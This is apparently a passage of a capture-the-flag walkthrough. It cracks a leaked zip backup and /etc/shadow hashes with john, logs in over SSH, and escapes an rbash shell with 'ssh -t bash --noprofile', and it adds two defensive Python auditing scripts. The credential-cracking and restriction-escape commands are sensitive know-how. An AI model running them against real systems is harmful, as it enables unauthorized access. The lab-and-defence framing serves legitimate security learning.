PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
| 256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_ 256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip
|_
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 itself only serves a directory listing with a save.zip in it. We download the zip and unzip it; it asks for a password, so we john it out:
┌──(kali㉿VirtualBox)-[~/Downloads]
└─$ zip2john save.zip > hash
┌──(kali㉿VirtualBox)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
manuel (save.zip)
So the password is manuel. After unzipping save.zip we have a bunch of spicy stuff:
┌──(kali㉿VirtualBox)-[~/Downloads/etc]
└─$ ll
total 24K
-rw-r--r-- 1 kali kali 829 Jun 27 2020 group
-rw-r--r-- 1 kali kali 33 Jun 27 2020 hostname
-rw-r--r-- 1 kali kali 185 Jun 27 2020 hosts
-rw-r--r-- 1 kali kali 1.8K Jun 27 2020 passwd
-rw-r----- 1 kali kali 1.1K Jul 7 2020 shadow
-r--r----- 1 kali kali 669 Feb 2 2020 sudoers
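The archive above is the classic backup-left-in-the-webroot leak: a copy of /etc, shadow and sudoers included, sitting behind a directory listing. As an added example (not part of the writeup), the following script is the check a defender would run over every archive reachable under a document root; the sensitive-path patterns and the sample archive are constructed here for the demonstration.

```python
"""Scan an archive served from a web root for files that should never be public.

Added example, not part of the writeup: save.zip above turned out to contain
etc/shadow and etc/sudoers. The pattern list and the sample archive are
constructed for this demonstration; extend the list for your own environment.
"""
import io
import json
import zipfile
from fnmatch import fnmatch

# Paths that never belong in a publicly served archive (constructed starting
# point, not an exhaustive list).
SENSITIVE_PATTERNS = [
    "etc/shadow*", "etc/gshadow*", "etc/sudoers", "etc/sudoers.d/*",
    "*/.ssh/id_*", "*/.ssh/authorized_keys", "*.pem", "*.key",
    "*/.bash_history", "*/.env", "*/wp-config.php",
]


def normalise(name: str) -> str:
    """Drop leading './' and '/' so './etc/shadow' and '/etc/shadow' both match."""
    while name.startswith("./") or name.startswith("/"):
        name = name[2:] if name.startswith("./") else name[1:]
    return name


def classify_member(name: str) -> bool:
    """True if an archive member path matches one of the sensitive patterns."""
    norm = normalise(name)
    return any(fnmatch(norm, pat) for pat in SENSITIVE_PATTERNS)


def scan_archive(data: bytes) -> dict:
    """Report on a zip held in memory.

    Member names live in the central directory in cleartext, so this works on
    password-protected archives too: zip encryption hides contents, not names.
    """
    report = {"members": 0, "encrypted": False, "sensitive": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            report["members"] += 1
            if info.flag_bits & 0x1:      # general-purpose bit 0: entry is encrypted
                report["encrypted"] = True
            if classify_member(info.filename):
                report["sensitive"].append(info.filename)
    return report


def build_sample_archive() -> bytes:
    """Constructed stand-in for save.zip: an /etc snapshot with placeholder data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("etc/hostname", "example-host\n")
        zf.writestr("etc/passwd", "root:x:0:0:root:/root:/bin/bash\n")
        zf.writestr("etc/shadow", "root:$6$PLACEHOLDER$PLACEHOLDER:18400:0:99999:7:::\n")
        zf.writestr("etc/sudoers", "root ALL=(ALL:ALL) ALL\n")
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python scan_archive.py [file.zip ...]; with no argument the sample is scanned.
    import sys
    paths = sys.argv[1:]
    if not paths:
        print(json.dumps(scan_archive(build_sample_archive()), indent=2))
    for path in paths:
        with open(path, "rb") as fh:
            print(path, json.dumps(scan_archive(fh.read())))
```

The point worth remembering from the password-protected save.zip: the scanner never needs the password, because zip member names are stored unencrypted in the central directory. A "protected" backup of /etc still tells anyone who lists it exactly which files are worth cracking for.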
We unshadow the passwd and shadow files into hehe.txt and john it again:
┌──(kali㉿VirtualBox)-[~/Downloads/etc]
└─$ unshadow passwd shadow > hehe.txt
┌──(kali㉿VirtualBox)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hehe.txt
server (296640a3b825115a47b68fc44501c828)
Such a long username. Now we ssh in with it:
┌──(kali㉿VirtualBox)-[~]
└─$ ssh [email protected]
[email protected]'s password: **server**
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
-rbash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
Even though we log in successfully, the shell is rbash, which means it is stupid and we can't run most commands from it, as in the following sample:
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ less local.txt
-rbash: less: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ vi local.txt
-rbash: vi: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ more local.txt
-rbash: more: command not found
rbash stands for restricted bash, so perhaps that is the challenge here. After some research on SSH, we can escape rbash by passing the command bash --noprofile together with the -t flag:
┌──(kali㉿VirtualBox)-[~]
└─$ ssh [email protected] -t "bash --noprofile"
[email protected]'s password: server
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ whoami
bash: whoami: command not found
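The escape works because sshd hands a client-supplied command to the user's login shell with -c, and rbash, as the session above shows, executes a second bash that is not restricted. The server-side control that stops this is a ForceCommand in sshd_config, which makes sshd ignore whatever command the client sends. As an added example (not part of the writeup), this script reports accounts whose only restriction is rbash; the sample passwd and sshd_config are constructed, restricted-menu is a hypothetical command name, and the parser assumes the usual "Keyword value" line form.

```python
"""Audit accounts whose only restriction is rbash.

Added example, not part of the writeup. Reports users with an rbash login
shell that no ForceCommand in sshd_config covers, i.e. users for whom a
client-supplied command would still reach 'rbash -c ...'. The sample passwd
and sshd_config below are constructed; the parser assumes "Keyword value"
lines and does not handle the rarer "Keyword=value" form.
"""
import os
from fnmatch import fnmatch


def parse_passwd(text: str) -> dict:
    """Map user name -> login shell from /etc/passwd-style text."""
    shells = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 7:
            shells[fields[0]] = fields[6].strip()
    return shells


def parse_sshd_config(text: str):
    """Return (global_force, forced_users).

    global_force: a ForceCommand outside any Match block applies to everyone.
    forced_users: user patterns from 'Match User ...' blocks whose only
                  criterion is User (a block that also matches on Address or
                  similar can be sidestepped by connecting from elsewhere, so
                  it is not credited) and that contain a ForceCommand.
    """
    global_force = False
    forced_users = set()
    current_users = None                      # None = global section
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and whitespace
        if not line:
            continue
        parts = line.split()
        key = parts[0].lower()                # sshd keywords are case-insensitive
        if key == "match":
            criteria = list(zip(parts[1::2], parts[2::2]))
            if len(criteria) == 1 and criteria[0][0].lower() == "user":
                current_users = set(criteria[0][1].split(","))
            else:
                current_users = set()         # narrower block; do not credit it
        elif key == "forcecommand":
            if current_users is None:
                global_force = True
            else:
                forced_users |= current_users
    return global_force, forced_users


def audit(passwd_text: str, sshd_text: str) -> list:
    """Sorted list of rbash users that no ForceCommand protects."""
    global_force, forced = parse_sshd_config(sshd_text)
    weak = []
    for user, shell in parse_passwd(passwd_text).items():
        if os.path.basename(shell) != "rbash":
            continue
        if global_force or any(fnmatch(user, pat) for pat in forced):
            continue
        weak.append(user)
    return sorted(weak)


# Constructed samples: alice relies on rbash alone, bob also has a ForceCommand.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
alice:x:1001:1001::/home/alice:/bin/rbash
bob:x:1002:1002::/home/bob:/bin/rbash
carol:x:1003:1003::/home/carol:/bin/bash
"""

# 'restricted-menu' is a hypothetical slash-free command name: rbash refuses
# command names containing '/', so a forced command has to sit on its PATH.
SAMPLE_SSHD = """Port 22
PasswordAuthentication yes
Match User bob
    ForceCommand restricted-menu
"""

if __name__ == "__main__":
    print("rbash-only users:", audit(SAMPLE_PASSWD, SAMPLE_SSHD))
```

Run against the samples it reports alice only: bob's Match block carries a ForceCommand, so an `ssh -t "bash --noprofile"` against bob would have its command ignored by sshd. Note the audit is deliberately strict about Match blocks with extra criteria, since a restriction that depends on the client's address is not a restriction on the account.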
However it is still a restricted environment: commands are not found by name. But since this is now plain bash rather than rbash, we can run commands by their absolute path starting with /, so: